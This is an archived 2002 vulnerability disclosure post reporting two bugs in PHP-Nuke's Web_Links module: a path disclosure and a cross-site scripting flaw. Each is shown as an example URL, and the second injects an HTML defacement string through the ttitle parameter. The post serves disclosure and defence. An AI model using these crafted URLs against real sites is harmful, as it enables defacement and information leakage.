Related information

Crossite scripting in PHPNuke/PostNUKE

More Cross site Scripting in PHPNuke

PHP-Nuke 5.5 , Phortail 1.2.1 , Avotravis 2.1

CSS in PHPNuke add-on

CrossSiteScripting PostNuke.

From:	Thi&eacute;baut <thiebaut.adsl_(at)_wanadoo.fr>
Date:	04.04.2002
Subject:	Security bugs in PhpNuke

Hello,

I found 2 security bugs in phpnuke

The first is a path disclosure vulnerability :
Change this
http://nukesite.xxx/modules.php?op=modload&name=Web_Links&file=index&
l_op=viewlink&cid=3
in that ...
http://nukesite.xxx/modules.php?op=modload&name=Web_Links&file=index&
l_op=viewlink

The second one is hax0r style :
change this ...
http://nukesite.xxx/modules.php?op=modload&name=Web_Links&file=index&
l_op=ratelink&lid=17&ttitle=Great_places_for_free_advertising!
to this...
http://nukesite.xxx/modules.php?op=modload&name=Web_Links&file=index&
l_op=ratelink&lid=17&ttitle=<h1>You%20HaVe%20BeEn%20HaX
0red!!!

By,
Thi&eacute;baut (napnap)